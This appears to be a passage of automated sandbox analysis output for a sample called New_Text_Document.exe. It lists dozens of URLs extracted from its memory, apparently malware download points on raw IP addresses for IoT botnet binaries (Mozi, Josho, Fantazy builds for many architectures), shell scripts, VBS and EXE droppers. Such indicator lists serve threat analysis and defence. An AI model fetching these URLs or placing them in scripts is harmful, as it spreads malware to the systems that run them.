                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.169/openssh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.169/pftp
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.169/sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.169/sshd
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.169/tftp
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.169/wget
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.91/2010/1/HTMLprofile.dOC
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.91/2010/1/MAH.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.91/2010/2/HTMLprofile.doc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.91/2010/2/san.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.91/2010/MAH.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.91/2010/SAN.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.90.28/csaff.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.112.34.58:34846/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.92.58.180:8000/d-8/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.129.13.190:31780/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.136.24.218:15954/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.217.6.71/cronometro/cronometro.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.217.6.71/cronometro/cronoupdater.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.255.30.170:30676/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.120.9.145:23629/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.191.162/AB4g5/Josho.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.191.162/AB4g5/Josho.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.191.162/AB4g5/Josho.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.191.162/AB4g5/Josho.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.191.162/AB4g5/Josho.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.191.162/AB4g5/Josho.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.191.162/AB4g5/Josho.mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.191.162/AB4g5/Josho.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.191.162/AB4g5/Josho.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.191.162/AB4g5/Josho.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.185.74/Fantazy/Fantazy.arc
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.185.74/Fantazy/Fantazy.arm4
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.185.74/Fantazy/Fantazy.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.185.74/Fantazy/Fantazy.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.185.74/Fantazy/Fantazy.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.185.74/Fantazy/Fantazy.i486
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.185.74/Fantazy/Fantazy.i686
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.185.74/Fantazy/Fantazy.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.185.74/Fantazy/Fantazy.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.185.74/Fantazy/Fantazy.mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.185.74/Fantazy/Fantazy.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.185.74/Fantazy/Fantazy.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.185.74/Fantazy/Fantazy.spc
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.185.74/Fantazy/Fantazy.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.185.74/catnet.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.235.55.179:38668/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.106.228.98:56051/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.106.230.42:6931/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.117.208.138:41689/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.117.7.70:38417/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.117.7.70:38417/i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.158.212.71/DZqN
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.249.79.24:55475/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.50.148.131:2341/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.73.131.162:34169/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.73.4.130:36320/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.160.185.131:41474/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://153.172.222.117:28861/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.126.178.16:30629/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.140.63.102:51384/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.255.82.143:47383/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.255.82.156:50964/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.255.82.158:43172/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.255.82.210:52109/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.255.82.211:46332/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.255.82.240:56666/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.255.82.251:49852/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.253.120.32/.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.253.120.32/.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.253.120.32/.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.253.120.32/.mpsl
